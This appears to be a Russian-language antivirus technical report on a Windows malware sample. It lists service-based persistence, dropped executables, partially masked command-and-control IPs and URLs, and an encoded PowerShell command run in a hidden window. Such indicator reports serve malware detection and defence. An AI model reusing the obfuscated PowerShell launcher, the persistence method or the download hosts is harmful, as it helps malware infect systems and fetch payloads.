Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\sbunattend] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\sbunattend] 'ImagePath' = '"%WINDIR%\SysWOW64\AzSqlExt\sbunattend.exe"'
- 'sbunattend' "%WINDIR%\SysWOW64\AzSqlExt\sbunattend.exe"
- 'sbunattend' %WINDIR%\SysWOW64\AzSqlExt\sbunattend.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHIANAA3ADkAbwB2AD0AKAAnAFEAcwA3ACcAKwAnADEAaQAnACsAJwBnADUAJwApADsALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBOAHYAOgBUAEUAbQBQAFwATwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\rumt_19.exe
- %WINDIR%\syswow64\azsqlext\sbunattend.exe
- %TEMP%\office2019\rumt_19.exe в %WINDIR%\syswow64\azsqlext\sbunattend.exe
- '11#.#8.142.170':80
- '17#.#28.14.92':8080
- http://an#####.#eadersareleader.com/fetch/OiIXe/
- http://11#.#8.142.170/EqXOJokRxfHQ/x51fzylfHF/XBJsEBk/
- http://17#.##8.14.92:8080/PWWH2vUmao/ via 17#.#28.14.92
- DNS ASK an#####.#eadersareleader.com
- '%TEMP%\office2019\rumt_19.exe'
- '%WINDIR%\syswow64\azsqlext\sbunattend.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAHIANAA3ADkAbwB2AD0AKAAnAFEAcwA3ACcAKwAnADEAaQAnACsAJwBnADUAJwApADsALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBOAHYAOgBUAEUAbQBQAFwATwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)